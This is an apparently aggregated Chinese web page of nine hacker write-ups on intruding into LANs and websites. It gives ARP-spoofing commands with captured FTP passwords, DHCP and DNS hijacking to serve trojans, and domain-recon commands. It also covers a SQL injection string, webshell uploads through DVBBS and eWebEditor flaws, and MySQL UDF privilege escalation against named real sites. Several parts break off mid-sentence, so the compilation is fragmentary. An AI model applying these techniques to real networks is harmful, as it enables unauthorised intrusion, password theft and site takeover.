“ymymll”通过精心收集,向本站投稿了9篇内网入侵windows xp的思路和方法网站安全,以下是小编整理后的内网入侵windows xp的思路和方法网站安全,希望你喜欢,也可以帮助到您,欢迎分享!

篇1:内网入侵windows xp的思路和方法网站安全
最简单的方法无非就是弱口令了
方法1.弱口令
用到的工具 ntscan ,recton,木马
可惜扫了一下一个弱口令都没有!再用superscan 扫了一下port ,发现7台电脑在线,只有三台没开防火墙,而且只开了137 netbios ,123 ntp等端口 只好放弃此方法
方法2. arp欺骗
用到的工具 arpsniffer
在host os (主系统)运行arpsniffer 却遇上提示driver有问题,晕菜,打开一台guest os (虚拟机) 2k3系统运行arpsniffer没问题,顺便嗅探一下自已,上网页的密码,竟然嗅探不到! FT,我也不知道是什么原因,以前在韩国的肉鸡上嗅探FTP密码是没问题的..也罢,此方法也放弃
方法3. 溢出
但考虑到大多电脑都不是开了防火墙,就是打了补丁,此方法也就罢了!
以下两种方法可能网上文章鲜少提过,我自已后来想出来的,但其实需要具备一个条件就是要有局域网的路由器管理权限
方法4. 利用 dhcp 分发地址更改网关到自已机子并嗅探
首先dhcp 分发的元素中有 ip地址,网关,子网掩码,DNS服务器,还有就是分发元素的有效时间(时间这个很重要)
我们要做的就是把dhcp的租期改成10分钟或更短,并把dhcp原来的网关ip地址(路由器lan口的地址)改成我主机的地址.以让所以客户端的数据流从我的主机上走,以达到嗅探(就像一条河有一个砸门,所有鱼要出去必须经过那个砸门)
dhcp工作的原理:
当一台主机开机启动会发出一个broadcast packet(广播包) 给router,router reviced 到 client os 的request packet(请求包) 就会给client host(客户机)一个reply packet (应答包),但是这个请求的ip信息,有效时间只有10分钟,当时间用掉一半 5分钟后,客户机会再次向router 请求 ip信息,我们把时间租期改短一些可以让客户机短时间内再次请求以恢复用路由做网关.
例:
原数据的流程
all client os => router => internet
修改dhcp 网关后的数据流程
all client os => my computer os => router => internet
我这里必须把我主机做为所有客户端的网关,同时又要把router 做为我的网关
注意:DHCP是自动分发地址,如果手动设地址的话,电脑不会发出请求的广播包,所以如果局域网有人用手动设置网关的话,当我改了网关,对方就不能上网.所以这个时候还有一种方法,就是先改路由lan接口的地址(网关),并把我主机的ip地址改成路由器lan口的地址,但是即使如此,之前与路由通讯过的客户端还是会照成短时间的不能上网,因为据转发是根据ip->mac (arp过程),之后根据mac地址转发,这时虽然ip换了,但是系统还是留着原网关的mac地址.所以数据包还是会发给原路由,所以其实是有点矛盾的,当我主机和路由交替了ip之后,网关地址没变,只是换了不同的角色(主机和路由交换),却又因为客户端的系统之前有和网关通讯过的MAC地址缓存,导致数据包继续发给路由器...
(这时只有arp -d 清除mac缓存或重启系统才会使数据包往我主机这里走,但是我们根本没办法清除mac或重启)
所以最好是不要用交替网关地址,而是把原网关地址改掉,但这样有可能手动设置ip和网关就因不能动态获取新网关(我主机)而数据包不从我主机这里走!
方法5. 更改DNS服务器,解析常用到地址到我们的主机
电信通常用的dns服务器地址是202.101.107.54,我们可以改成是内网一台机子192.168.1.3(这是我的一台虚拟机,同样有dns server),这时我在我的2k3上安装dns服务器和iis服务器,建立 163 ,baidu,google,sina,yahoo,hao123等常用网址的解析条目,让凡事访问这些网址都全部解析到192.168.1.1,呵呵,然后我们做一个网页木马!
如果没有网页木马就做一个能吸引人的网页内容,比如****门,嘿,下载吧!做个自解压木马,一运行就中..当然要对方很傻很天真的情况下!
篇2:教新手入侵内网的思路
简单内网渗透刺探命令:
1.ipconfig /all
//可以查看到当前网卡配置信息,包括所属域以及IP段
这个命令可以看到:主机名字---shwdm,IP--192.168.103.8,网关IP---192.168.103.10,DNS 域名解析地址IP---192.168.100.1,主WINS服务器IP---10.0.22.5
2.net view
//显示正由指定的计算机共享的域、计算机或资源的列表,如果在没有参数的情况下使用,则 net view 显示当前域中的计算机列表。
可以看到我们当前域共有8台机器,我们的这台机器--SHWDM 也在其中
3.ping 机器名
//显示该机器名的IP
如图PING BJCWSERVER,我们得到这个名字叫BJCWSERVER的主机IP为192.168.103.50
4.net view /domain
//查看有多少域
5.net view /domain:testdomain(testdomain 假设为目标的其中一个域)
//此命令是查看 testdomain域中的计算机列表
我们分别查看这三个域中的计算机列表,可以查到MYGROUP域下面只有一台叫NCSERVER的机器,而且系统是LINUX的,是个SAMBA 服务器
6.net user /domain
//获取所有域用户列表
7.net group /domain
//获取域用户组信息
8.net group “domain admins” /domain
//查看与管理组成员
9.net user domain-admin /domain
//查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息!
10.net time /domain
//可以查看域时间,以及域服务器的名字(快速查找域的方法之一 By LCX)
总结下,通过这次信息收集,我们可以得到:
1.这个内网的网关为 192.168.103.10,DNS 域名解析IP为192.168.100.1,主WINS服务器为10.0.22.5
2.一共有三个域,其中WORKGROUP域下面有8台机器(本机亦属其域),POLYCOMRSS 域下面有一台,MYGROUP域下面有一台SAMBA SERVER,系统是LINUX
篇3:入侵内网服务器
扫描学校内网的服务器 出来的 如何简单的入侵
大家帮忙列举几个方法 以及需要的东西 谢谢了
21 File Transfer Protocol [Control]
|___ 220 Serv-U FTP Server v6.4 for WinSock ready.....
80 World Wide Web HTTP
|___ HTTP/1.1 403 Forbidden..Content-Length: 218..Content-Type: text/html..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: S
|___ 110 Post Office Protocol - Version 3
|___ 1025 network blackjack
|___ 1026
|___ 1723 pptp

|___ 3128 Squid Proxy
|___ 3389
篇4:如何入侵网站
在看文章这之前想告诉新手们入侵一般的5个步骤: 1,确定目标,新手们就是拿着扫描器乱扫一通,但高手们选定一个目标一定攻下为止,因为在他们心中没有系统是没有漏洞的,
如何入侵网站
,
2,信息收集,一般的信息收集就是拿着扫描器扫,但我这次所要说的重点不在扫描器。 3
篇5:ARP监听渗透内网的方法网站安全
假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
第一步:
tracert 61.139.1.1
C:/WIN/system32>tracert 61.139.1.1
Tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]
Trace complete.
这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能
进行ARPSNIFFER了
第二步:看本机IP设置和网卡情况
C:/WIN2000/system32>ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : smscomputer
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.139.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.139.1.65
DNS Servers . . . . . . . . . . . : 61.139.1.73
说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以知道网关是61.139.1.65
第三步:查看本机时间
C:/WIN2000/system32>net time //127.0.0.1
//127.0.0.1 的当前时间是 /1/28 下午 09:13
命令完成成功
要注意的是这儿的时间是12小时式,用at命令应要24小时式
第四步:编写启动ARPsniffer的bat文件
C:/WIN2000/system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:/winnt/a.bat
注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
Usage: ArpSniffer [/RESET]
第五步:后台运行开始嗅探咯
C:/winnt/system32>at //127.0.0.1 20:44 c:/winnt/a.bat
注意:这儿的时间要用24小时式
arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
执行完第四步要先安装WINPCAP 2.1驱动
同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子
第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉
以SYSTEM权限启动的ARPSniffer程序
C:/winnt/system32>pulist
...................
conime.exe 248 NT AUTHORITY/SYSTEM
explorer.exe 1864 SMSCOMPUTER/Administrator
CSRSS.EXE 2256 NT AUTHORITY/SYSTEM
Arpsniffer.exe 2322 NT AUTHORITY/SYSTEM ----就是它了!
WINLOGON.EXE 2344 NT AUTHORITY/SYSTEM
......................
杀了它
C:/winnt/system32>pskill 2322
PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
Process 2322 killed.
C:/winnt/system32>type 1.txt 我的例子中嗅探的是FTP密码:)
...............
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
............
............
特别要注意的就是PASS哈:)
----------------------------------------------------
付录:
前台正常执行的显示
C:/>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
Network Adapter 0: Intel(R) 8255x Based Network Connection
Enable IP Router....OK
Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61.139.1.79: Mac of 61.139.1.65 ===>Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===>Mac of 61.139.1.88
有时这儿要先显示can not open driver(0)不管它等一下就可以了
Begin Sniffer.........
篇6: 入侵网站的方法总结
现在网上的攻击事件越来越多, 都是通过什么方法来攻击我们的呢?下面我们给大家总结了 入侵网络的五十种方法,让大家做到有备无患,
入侵网站的方法总结
,
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络 2.搜索栏里输入 关键字%'and 1=1 and '%'=' 关键字%'a
篇7:再记一次网站入侵网站安全
打开直接试了试默认的用户名和密码,结果用admin admin进去了
这个后台太简单了,估计不是这个网站的真正后台,是网站另一个组成部分的后台,没什么用,
再次浏览网站,未发现注入点,不过看到他有个BBS,打开看到版本是DVBBS8.0的。首先DVBBS8.0是有漏洞的,就看他有没有打补丁了,接着便从入侵最简单的猜测+默认开始,直接访问BBS后台提示登陆,用默认的admin admin888登陆失败,再次访问DVBBS数据库,看看能不能把它数据库下载下来,结果成功下载到了数据库,发现后台密码是默认的,可是怎么登陆不了呢?
对了,还有个前台密码,可能前台密码不是默认的吧,在DV_USER表中找到了前台密码,这次成功登陆进去了,
DVBBS8.0后台拿webshell网上教程一大堆,可以去百度一下。大体如下:
1.创建一个数据库文件并插入一句话马。
2.后缀改为rar或其他DVBBS支持上传的格式。
这里备份数据库要注意一下,以前我们拿DVBBS都是备份成asp格式,但现在DVBBS最了后缀限制了,那怎么搞呢?
记不记得IIS6.0的那个以.asp命名文件夹,该文件夹下的所有文件都会被当成asp文件执行的漏洞?关键就在这里了,我们备份一个目录名带.asp的。不就OK了?
篇8:入侵狐狸 学习网网站安全
废话不说,直接进入主题,先看看这个站的建站时间 域名注册日: -5-14 21:23:00 【图2】
看来是个新站,可能有的地方的安全还没做到位,仅是个人猜想,我们先找找管理员的名字吧 【图3】
这个很重要,当你入侵一个站的时候,最起码知道这个站的管理员是谁吧。再看看str0m的个人资料,我们百度下【图4】
这里我们找到了管理员str0m的个人博客www.str0m.cn前面做的都是准备工作,让你对一个站的基本信息和管理人员有个了解。下面开始我们的行动:(分析)站点论坛程序版权为Phpwind,大家都知道这样的论坛,一般的注入,扫描几乎否没什么用,所以只能从别的方面去入手了。www.foxteam.cn >>60.172.190.207www.str0m.cn >>60.172.190.207检测管理员两个站点是同一个服务器的,下面我们旁注下这个服务器有哪些站点。foxteam.cn has the IP address: 60.172.190.207119 found with the IP 60.172.190.207【图5】
很幸运的是我找在服务器里到了一个站点www.XXX.com/movie.asp?id=3DB权限 当前库名:sqlsqlXXX 当前用户:sqlXXX[
既然有DB权限那我们就去列下服务器里的目录【图7】
119个站 要找我们的站点目录地址(有点难)我花了1小时左右就是找不到我们要入侵站点foxteam.cn的目录焦炉………………思考foxteam.cn和str0m.cn在同一个服务器,同一个管理员,那目录会不会是于str0m这个有关,继续寻找…………运气来了,【如图8】
找到了,后在寻看网站的物理地址的时候发现了一个致命的漏洞e:\clientweb\3g\str0m\wwwroot\kldtpb\eWebEditor【图9】
默认的后台 admin_login.asp下面就开始进入 eWebEditor后台【如图10】
这里管理员很疏忽忘了改密码! 默认账号:admin admin 后面的步骤就是 在 eWebEditor后台添加样样式管理 直接添加PHP木马,
(这个步骤就不详细写了…………)就这样一个 学习网成功拿下~【如图11】
篇9:入侵沸点联盟网站安全
沸点联盟:www.fd98.com/
就一论坛,叫我从PHPWIND入手难度太大了。还是旁注看看吧。
搜索:www.114best.com/ip/114?w=www.fd98.com
这里查到绑了43个站啊。嘿嘿。看来有戏了。
首先攻破的是这个站:www.lccistudy.com 有注入点。哎。还做 站。绑一起的站居然有注入!
但是进了后台硬是没拿下webshell。极度郁闷!
继续看吧。反正站很多。接下来是个BBS的。DVBBS8.0的数据库被我下下来了。但是MD5硬是没解出来。我就不截图了。
打开网站:www.zenwicom.com 的时候。一看就知道一老漏洞了,
本地上传漏洞。
这套系统拿webshell发就很多了。我是直接本地上传的。如果不行可以注入中转来拿到管理权限然后进去拿。我已经拿到了。
下面就是提权了。提权花了些时间。因为管理很BT。他把系统装到F盘。把3389端口改到33890
这些都是我慢慢发现的。我在SHELL里的查看可写目录里发现D盘的d:\web可读。
进去看了下居然是MYSQL的。ROOT账号密码就躺在那。
默默祈祷三秒种。希望我那webshell有PHP执行权限。传个SU.PHP发现可以。
下面就是提权了。首先导出udf.dll在执行命令。
然后就是终端登陆了。
拿这个站总得来说还是比较顺利的。












